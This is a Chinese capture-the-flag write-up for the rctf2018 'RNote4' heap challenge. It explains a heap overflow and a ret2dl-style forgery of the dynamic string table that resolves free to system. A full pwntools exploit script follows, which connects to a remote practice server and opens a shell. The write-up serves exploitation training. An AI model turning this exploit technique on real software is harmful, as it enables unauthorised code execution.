rctf2018_rnote4(堆与dl_load相结合)

首先，检查一下程序的保护机制,无RELRO保护，无PIE保护

然后，我们用IDA分析一下，edit功能里可以自由控制长度，存在溢出

整个程序**[没有任何的输出]{.mark}**

通过堆溢出，我们可以轻松构造任意地址写，但是没有输出函数，不能泄露地址，由此，想到了一个巧妙的方法，这个程序没有开启RELRO保护，那么其dt_strtab是可以修改的

那么，我们只要在这里，将strtab表指针改成我们伪造的字符串表，然后，将某函数的got修改为其对应的plt load地址，当接下来调用该函数时，就可以将该函数解析为我们在字符串表里指定函数名的函数地址，这原理就是ret2dl的原理。在这里，我们将free函数解析为system函数，然后拿shell

#coding:utf8
from pwn import *

#sh = process('./RNote4')
sh = remote('node3.buuoj.cn',28637)
elf = ELF('./RNote4')
free_got = elf.got['free']
free_got_ld = 0x0000000000400626
#在NO relro的情况下伪造dynstr即可解析任意函数
fake_dynstr_addr = 0x00000000006020D0 + 0x100
fake_dynstr = '\x00'*0x5F + 'system\x00'
fake_dynstr = fake_dynstr.ljust(0x73,'\x00')
fake_dynstr += 'GLIBC_2.4\x00GLIBC_2.2.5\x00'
dt_strtab = 0x0000000000601EB0

def add(size,content):
   sh.send(p8(1))
   sh.send(p8(size))
   sh.send(content)

def edit(index,size,content):
   sh.send(p8(2))
   sh.send(p8(index))
   sh.send(p8(size))
   sh.send(content)

def delete(index):
   sh.send(p8(3))
   sh.send(p8(index))

add(0x20,'a'*0x20) #0
add(0x80,'b'*0x80) #1
add(0x20,'/bin/sh\x00'.ljust(0x20,'\x00')) #2

payload = 'a'*0x20 + p64(0) + p64(0x21) + p64(0x80) + p64(fake_dynstr_addr)
edit(0,0x40,payload)
#伪造dynstr
edit(1,len(fake_dynstr),fake_dynstr)

payload = 'a'*0x20 + p64(0) + p64(0x21) + p64(0x80) + p64(dt_strtab)
edit(0,0x40,payload)
#修改dynstr指针
edit(1,0x8,p64(fake_dynstr_addr))

payload = 'a'*0x20 + p64(0) + p64(0x21) + p64(0x80) + p64(free_got)
edit(0,0x40,payload)
#修改dynstr指针
edit(1,0x8,p64(free_got_ld))
#getshell
delete(2)

sh.interactive()